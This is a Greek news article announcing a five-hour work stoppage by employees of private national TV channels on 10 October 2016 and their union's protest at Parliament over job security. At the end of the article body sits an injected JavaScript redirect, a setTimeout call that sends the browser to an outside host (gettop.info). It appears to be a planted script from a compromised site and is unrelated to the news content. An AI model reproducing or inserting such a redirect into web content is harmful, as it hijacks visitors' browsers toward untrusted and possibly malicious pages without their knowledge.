Πεντάωρη στάση εργασίας στα ιδιωτικά κανάλια σήμερα

0
3

 

Σε πεντάωρη στάση εργασίας από τις 10:00 έως τις 15:00, προχωρούν οι εργαζόμενοι στους ιδιωτικούς τηλεοπτικούς σταθμούς που θα πραγματοποιήσουν συγκέντρωση διαμαρτυρίας στην είσοδο της Βουλής

Σύμφωνα με ανακοίνωση της ΕΣΗΕΑ, αιτήματα είναι η διασφάλιση των θέσεων εργασίας στους τηλεοπτικούς σταθμούς πανελλαδικής εμβέλειας και η σταθερή και μόνιμη εργασία με Συλλογικές Συμβάσεις Εργασίας.

Η ανακοίνωση της ΕΣΗΕΑ

Τα Διοικητικά Συμβούλια της ΕΣΗΕΑ και της ΕΠΗΕΑ αποφάσισαν την κήρυξη 5ωρης στάσης εργασίας από τις 10.00 έως τις 15.00 της Δευτέρας, 10 Οκτωβρίου 2016, για όλους τους δημοσιογράφους και τους διοικητικούς υπαλλήλους, που εργάζονται στους ιδιωτικούς τηλεοπτικούς σταθμούς πανελλήνιας εμβέλειας (ALPHA, ΑΝΤΕΝΝΑ, ΜΑΚΕΔΟΝΙΑ, MEGA, ΣΚΑΙ, STAR CHANNEL ΚΑΙ EPSILON TV).

Η στάση εργασίας αποφασίστηκε προκειμένου οι συνάδελφοι να συμμετάσχουν μαζικά σε συγκέντρωση διαμαρτυρίας, που θα πραγματοποιηθεί τη Δευτέρα, 10 Οκτωβρίου στις 10:30 π.μ. στην είσοδο της Βουλής των Ελλήνων με αιτήματα:

Διασφάλιση των θέσεων εργασίας στους τηλεοπτικούς σταθμούς πανελλαδικής εμβέλειας.

Σταθερή και μόνιμη εργασία με Συλλογικές Συμβάσεις Εργασίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here